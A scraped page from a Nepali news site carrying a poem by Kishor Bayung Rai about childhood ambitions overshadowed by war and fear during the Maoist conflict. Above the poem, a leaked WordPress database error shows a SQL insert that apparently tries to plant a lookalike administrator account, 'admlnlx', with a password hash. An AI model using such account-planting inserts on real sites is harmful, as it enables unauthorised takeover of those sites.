WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMcHO5.3rTJAq47ZD3E3krhtp9xz5T0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 06:51:05', '', 'admlnlx', 'admlnlx')

” के बन्छस ? सोध्नेलाई ?” – Gaule Khabar

” के बन्छस ? सोध्नेलाई ?”

कबिता

” के बन्छस ? सोध्नेलाई ?”
उहिले के बन्छस भनेर सोध्नेलाई भन्न मन लाग्थ्यो
मेरो जिजुले पहिलो बिश्व युद्ध लडेको छ
बराजुले दोस्रो बिश्व युद्ध लडेको छ
बाजेले मालायको बन्कर खनेको छ
म मा त्यो बीरको रगत छ र, म लाहुरे बन्न चाहन्छु
फेरि सम्झन्थे ती योद्धा पुर्खाहरुले ल्याएको बन्दुक चलाउदा
मेरो बाउको जिउभरी छर्रा पसेको
अनि फेरि भन्थे पाईलट
फेरि हावाई जहाज पनि ठोकिमरेको सुनाउथ्यो रेडियो फेरि डर लाग्थ्यो
फेरि भन्न मन लाग्थ्यो
पुलिस आर्मी फेरि माओबादी सङ्ग स्कुल वरिपरिनै पड्काउदै लुकामारी खेलेको
आफैलाई पढाउने शिक्षकजस्तो बनु भने पनि सङ्कटकालको बेला
कतिबेला ठ्याम्काना पाईन्छ पत्तो नहुने त्यो कलिलो उमेर डरैडरमा बित्यो।
ड्राईभर बन्छु भनिन्थ्यो होला त्योबेला सडक गोरेटो पच्छ्याउदै गाउँ पसेकै थिएन अनभिज्ञ भईयो
खेति किसानि बनौ
आमाबाबा हाम्रो दुख तिमारुको लागि भन्नुहुनथ्यो फेरि,
गोठाला मेलापात गर्दाको हैरानी तेसैले इलिक इलिक
यसरी नै बिते उकुसमुकुस र डरै डरमा बचपन
आजको समय र त्यो बेला भएको भए आजको म त्यो बेला भएको भए अर्थात ,
त्यो बेलाको म आज भएको भए भन्ने थिए-“सकेसम्म सबैको प्यारो बन्ने कोसिस गर्ने छु।”
– किशोर बायुङ राई

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका